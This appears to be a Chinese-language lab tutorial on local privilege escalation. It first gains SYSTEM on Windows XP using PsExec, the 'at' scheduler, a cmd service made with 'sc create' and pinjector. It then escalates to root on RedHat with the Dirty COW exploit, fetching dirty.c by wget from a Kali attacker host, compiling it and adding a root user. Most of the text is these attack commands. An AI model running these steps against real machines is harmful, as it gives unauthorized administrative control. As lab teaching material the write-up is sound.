（administrator权限——>system权限）

在Windows XP下创建一个管理员（administrator用户）用户：zhangsan

将Psexec.exe程序拖到VMware虚拟机Windows XP中，并点击打开psexec.exe程序。

命令：PsExec -i -s cmd

# 使用Psexec工具打开system权限的cmd窗口，其中：i表示交互式，s代表system；

系统调度任务命令：

命令：at 11:25 /interactive cmd # 以system的权限打开cmd后，此后所有在该cmd打开的应用程序都是具有system权限的；

运行结果，当时间到达11:36时，系统会以system的权限打开cmd，说明提权成功！！！

注意：如果WindowsXP里面没有whoami命令，可以通过在kali系统中：/usr/share/windows-binaries/目录下的——>whoami.exe文件，拷贝到Windows XP下的C:\WINDOWS\system32目录下。具体步骤可以参考《实现不同主机之间文件的复制——scp命令和wget命令》微博。

首先明白一个定义:程序所拥有的权限,取决与运行该程序的身份；

前面的操作都是在单个的cmd窗口中打开system权限的窗口的，那么如何使在这个桌面上打开的cmd窗口为在system权限运行？

在system权限的窗口中打开任务管理器（即，命令：taskmgr），然后结束桌面进程，创建一个新的桌面进程（explorer.exe），以后在桌面中打开的cmd窗口都是以system权限运行的；

在system权限的cmd下输入taskmgr命令，进入syatem权限的资源管理器，关闭当前explorer.exe的桌面命令； 在使用system权限开启explorer.exe命令的桌面 成功进入system系统；

采用服务的方式提取权限，这是因为所有的服务都会默认以system帐号去启动，所以借助这个思路去创建一个服务（打开cmd的服务），之后启动这个服务，打开cmd命令行窗口就是以system权限启动的。

通过命令：sc Create syscmd binPath= “cmd /K start” type= own type= interact #创建一个syscmd服务。注意之间的空格，不能省略；

开启本地服务； 可以通过图形化的方式直接开启system服务，在通过命令行的方式开启服务；

命令：pinjector.exe

命令：pinjector.exe -l

命令：pinjector.exe -p PID(已存在进程号) cmd 8000

取得XP系统的system权限了。

前提条件是攻击者已经能够成功登录目标机一个普通账户！！！ Dirty.c（脏牛）的下载地址为：https://github.com/FireFart/dirtycow

攻击机kali的IP地址：192.168.85.170

目标机RedHat的IP地址：192.168.85.131

1、将dirty.c放在kali攻击机的/var/www/html目录下，模拟上面的dirty.c的下载地址；

2、开启apache服务；

命令为：/etc/init.d/apache2 start

3、测试网页是否成功；

1、假设已经进入目标机的普通用户：zhangsan。并已经模拟设置攻击机kali的网站上下载dirty.c的脚本；

命令：wget http://192.168.85.170/dirty.c

2、编译执行脚本输出自己定义的文件里，并生成可执行文件exp；

命令：gcc -pthread dirty.c -o exp -lcrypt # 对下载的dirty.c文件进行编译,使其生成可执行文件exp

3、执行自定义脚本文件并为其指定登录密码；

命令：./exp 123.com # 运行exp文件，并设置密码；

4、查看passwd文件；

发现已经提权成功；

5、进行验证：使用firefart和自定义的密码，登录；